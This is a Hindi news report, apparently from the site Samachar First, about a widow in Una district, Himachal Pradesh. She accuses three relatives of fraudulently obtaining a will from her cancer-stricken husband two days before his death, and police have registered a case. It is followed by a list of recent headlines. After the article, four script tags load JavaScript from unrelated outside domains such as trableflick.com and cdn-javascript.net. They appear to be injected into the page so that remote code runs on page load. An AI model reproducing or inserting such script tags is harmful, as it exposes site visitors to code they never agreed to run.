ऊनाः महिला ने देवर और जेठ पर लगाए धोखे से वसीयत हड़पने के आरोप, मामला दर्ज़

<p>जिला ऊना में हरोली उपमंडल के कुठार बीत गांव की निवासी विधवा महिला ने अपने देवर और जेठ के बेटों पर हेराफेरी कर महिला के कैंसर पीड़ित पति से जमीन अपने नाम लिखवाने का आरोप जड़ा है। पीड़िता ने इस संबंध में पुलिस को शिकायत सौंप दी है। वहीं पुलिस ने महिला की शिकायत के आधार पर कार्रवाई करते हुए तीन आरोपियों के खिलाफ केस दर्ज करते हुए मामले की जांच शुरू कर दी है।</p>

<p>मिली जानकारी के मुताबिक हरोली के गांव कुठार बीत की निवासी उर्मिला देवी ने पुलिस को दी शिकायत में बताया कि उसके दिवंगत पति सतपाल कैंसर की बीमारी से पीड़ित थे। जिसका इलाज के दौरान 20 नवंबर 2019 को निधन हो गया था। लेकिन सतपाल की मौत से ठीक दो दिन पहले 18 नवंबर को उसके देवर के बेटे हर्ष कुमार, पवन कुमार और उसके जेठ का बेटा संजीव कुमार सतपाल को कैंसर की दवा दिलाने के के बहाने घर से ले गए। लेकिन उन्होंने इस दौरान हेराफेरी करते हुए इसके पति सतपाल की जमीन को लेकर वसीयत नामा भरवाया और उसकी जमीन अपने नाम कर ली।</p>

<p>वहीं, वसीयत बनाने के दो दिन बाद सतपाल की मौत हो गई। महिला को मामले का हाल ही में पता चला, जिसे सुनकर उसके होश फाख्ता हो गए। मामले की जानकारी मिलते ही पीड़ित विधवा ने अपने साथ हुई धोखाधड़ी को लेकर हरोली पुलिस को शिकायत सौंपी। डीएसपी हरोली अनिल कुमार मैहता ने बताया कि पुलिस ने पीड़िता की शिकायत के आधार पर आरोपियों हर्ष कुमार, पवन कुमार और संजीव कुमार के खिलाफ आईपीसी की धारा 420 और 120बी के तहत केस दर्ज करके मामले की जांच शुरू कर दी है। आगामी कार्रवाई अमल में लाई जा रही है।</p>

<p><img src=”/media/gallery/images/image(5967).jpeg” style=”height:320px; width:640px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1584532072624″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

हिमाचल प्रदेश मे 1.92 लाख किसान कर रहे प्राकृतिक खेती

हिमाचल प्रदेश मे 1.92 लाख किसान कर रहे प्राकृतिक खेती , प्रदेश मे 28 हजार…

28 mins ago

कांग्रेस सत्ता में आई तो पहली नौकरी की गारंटी पक्की: आनंद शर्मा

कांग्रेस सत्ता में आई तो पहली नौकरी की गारंटी पक्की: आनंद शर्मा पीएम मोदी का…

31 mins ago

मतदाताओं को मतदान का संदेश देने के लिए साइकलिंग एक्सपीडिशन स्पीति पहुंची

दुनिया के सबसे ऊंचे पोलिंग बूथ टशीगंग से साइकिल सवार देश के मतदाताओं को मतदान…

7 hours ago

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू-माफिया: CM

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू- माफिया : मुख्यमंत्री…

8 hours ago

बैजनाथ सहित अन्य विधानसभा क्षेत्र में सहायक मतदान केन्द्र होंगे स्थापित

विधानसभा क्षेत्र 20-बैजनाथ (अ.जा.) के 99-बड़ाभंगाल और 54-कसौली (अ.जा.) के 27-ढिल़्लों में सहायक मतदान केन्द्र…

8 hours ago

हिमाचल की चारों सीटों पर प्रचंड बहुमत से कमल खिलेगा: BJP

भारतीय जनता पार्टी के राष्ट्रीय अध्यक्ष जगत प्रकाश नड्डा द्वारा हिमाचल प्रदेश के नूरपुर, चंबा…

8 hours ago